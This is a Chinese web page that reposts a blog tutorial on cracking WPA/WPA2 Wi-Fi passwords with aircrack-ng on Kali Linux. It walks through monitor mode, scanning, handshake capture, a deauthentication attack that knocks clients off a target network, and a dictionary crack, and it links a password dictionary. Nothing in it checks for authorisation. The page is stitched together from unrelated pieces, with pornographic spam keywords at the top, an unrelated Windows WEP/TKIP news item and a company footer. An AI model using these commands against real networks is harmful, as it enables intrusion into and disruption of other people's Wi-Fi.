操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    前言

    最近整理了一些奇安信&華為&深信服大佬的課件資料+大廠面試課題,想要的可以私信自取,無償贈送給粉絲朋友~

    一、什么是Aircrack-ng

    Aircrack-ng是一個與802.11標準的無線網絡分析有關的安全軟件,主要功能有:網絡偵測,數據包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持監聽模式的無線網卡上(設備列表請參閱其官方網站)并嗅探802.11a,802.11b,802.11g的數據。該程序可運行在Linux和Windows上。Linux版本已經被移植到了Zaurus和Maemo系統平臺, 并概念驗證可移植到iPhone

    運行環境

    使用Kali 2021.3進行演示操作
    軟件:aircrack-ng(Kali系統內置)
    外置無線網卡設備: 要支持監聽,支持Linux并且免驅(我這里使用的是RT3070)

    插入網卡設備

    1. 進入Kali系統之后插入自己的網卡
    2. 右鍵查看網卡是否連接到Kali

    二、破解流程

    1.進入管理員模式

    命令: sudo su
    解釋: 不在管理員模式下運行可能會有權限不夠的提示

    提示:執行命令之后輸入Kali的密碼,密碼是被隱藏的,直接輸入然后回車即可

    2.查看網卡信息

    命令: iwconfig/ifconfig
    解釋: iwconfig查看網卡的信息、ifconfig查看新連接的設備
    wlan0就是我們的無線網卡

    3.殺掉沖突進程

    命令: airmon-ng check kill
    解釋: 殺死進程可以讓搜索更準確,不會受到影響

    4.查看網卡是否支持監聽模式

    命令: airmon-ng
    出現你的網卡信息就說明你的網卡支持監聽

    5.開啟無線網卡監聽模式

    命令: airmon-ng start wlan0
    解釋: start開啟哪個接口 wlan0是接口的名字

    再用iwconfig查看一下網卡信息,wlan0后面多了個mon,wlan0mon就說明已經開啟監聽了

    5.獲取附近的AP信息(搜WIFI)

    命令: airodump-ng wlan0mon
    解釋: BSSID:WIFI的MAC地址、PWR:信號強度(值越小信號強度強)、Data:監聽期間流量總合、CH:信道、ENC:加密算法、ESSID:WIFI名稱

    提示:找到網絡之后CTRL+Z結束搜索就可以

    6.開始抓取握手包并保存成文件

    命令: airodump-ng -c (頻道號) --bssid (MAC地址) -w (抓取的數據包的保存位置) wlan0mon
    解釋:

    1.c:信道

    2.bssid:BSSID值

    3.w:捕獲的握手包要保存到的路徑

    我要破解的目標網絡是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目錄下創建了一個名為1的文件夾
    輸入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon

    提示:所有的數值都要寫剛剛查到要破解的WIFI其中一個客戶端的值

    (1) 等待新的設備連接WIFI

    當新的客戶端連接時,客戶端輸入密碼連接就可以抓到握手包,右上角出現WPA時就表示已經抓到了對方的握手包

    (2) 主動攻擊

    命令: aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon
    解釋:

    0 :對客戶端表示發起攻擊,讓設備斷開連接

    2:表示攻擊次數,0表示一直攻擊

    a :指定無線路由器BSSID

    c :指定強制斷開的設備MAC

    執行命令aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon
    捕捉到握手包時就停止攻擊

    注意:執行主動攻擊的時候新建一個終端執行命令,原來的抓包終端不要結束

    6. 破解握手包密碼

    命令: aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap
    解釋:

    a2:WPA的握手包

    b :破解的WIFI的BSSID

    w :指定字典文件

    * :.cap是抓取到握手包的數據包文件

    最后就是等待跑字典了,下面就是破解的WIFI密碼,密碼是20041101

    7.關閉監聽模式

    命令: airmon-ng stop wlan0mon
    在監聽模式下,kali不能連接網絡

    三、總結
    1.問題

    插入網卡,如果查看不到網卡信息,可以點開連接WIFI看一下能否搜索到附近的網絡,如果不行那就右鍵系統可移動設備-把網卡斷開再重新連接一下

    2.密碼字典

    插入網卡,打開網卡的監聽模式,搜索附近的WIFI,獲取握手包,最后跑字典破解握手包,這里給大家提供一個常用的密碼字典

    鏈接: https://pan.baidu.com/s/1NSNniAvaLdcY0HALbBnUTw?pwd=gg7y
    提取碼: gg7y


    版權聲明:本文為CSDN博主「HonkerG」的原創文章

    原文鏈接:https://blog.csdn.net/RFZ_322/article/details/123344248

    在宣布移除“我的人脈”(My People)應用之外,Windows 10 November 2019功能更新還將移除對WEP和TKIP的WiFi網絡支持。在Windows 10 May 2019(Version 1903)功能更新中,當用戶連接到的WEP或者TKIP的WiFi網絡時候,系統會警告用戶這些協議非常容易被黑客入侵。

    微軟警告稱,在未來的版本更新中,Windows10將會拒絕接入此類WiFi網絡中。微軟建議用戶使用支持AES密碼的路由器,并通過WPA2或者WPA3協議對網絡進行加密。WEP的歷史可以追溯到1997年,并且是802.11a和802.11b設備可用的唯一加密協議。 它在2001年完全破解,只需要1分鐘的數據包收集就可以暴露出加密密鑰。

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有